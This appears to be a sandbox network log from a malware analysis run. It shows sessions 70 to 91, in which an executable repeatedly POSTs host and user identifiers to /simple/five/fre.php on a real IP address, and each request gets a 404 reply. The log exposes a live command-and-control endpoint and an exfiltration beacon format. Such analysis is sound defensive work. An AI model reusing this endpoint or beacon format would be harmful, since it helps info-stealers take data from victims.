Jan 10, 2025 23:40:33.445697069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.9	50050	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:33.595974922 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:33.600821972 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:34.369199991 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.9	50051	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:34.519795895 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:34.524652004 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:35.253545046 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.9	50052	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:35.414771080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:35.419612885 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:36.154293060 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.9	50053	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:36.306629896 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:36.312372923 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:37.040738106 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.9	50054	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:37.186683893 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:37.191586018 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:37.887149096 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.9	50055	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:38.034048080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:38.038960934 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:38.783715963 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.9	50056	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:38.941714048 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:38.946532965 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:39.680305004 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.9	50057	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:39.834460020 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:39.839304924 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:40.580161095 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.9	50058	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:40.736473083 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:40.741383076 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:41.452430964 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.9	50059	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:41.622955084 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:41.627955914 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:42.341339111 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.9	50060	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:42.488850117 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:42.493662119 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:43.231003046 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.9	50061	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:43.382637978 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:43.387530088 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:44.110176086 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.9	50062	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:44.262866020 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:44.267924070 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:44.984807014 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.9	50063	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:45.488189936 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:45.492997885 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:46.211401939 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.9	50064	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:46.372221947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:46.379070044 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:47.089814901 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.9	50065	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:47.272799015 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:47.277777910 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:47.997868061 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.9	50066	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:48.288489103 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:48.293317080 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:49.004328012 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.9	50067	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:49.160940886 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:49.166291952 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:49.867835999 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.9	50068	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:50.026371002 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:50.031342983 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:50.722242117 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.9	50069	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:50.878226042 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:50.883229017 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:51.592248917 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.9	50070	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:51.739484072 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:51.744359970 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:52.428802013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.9	50071	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:52.583261013 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:52.588350058 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
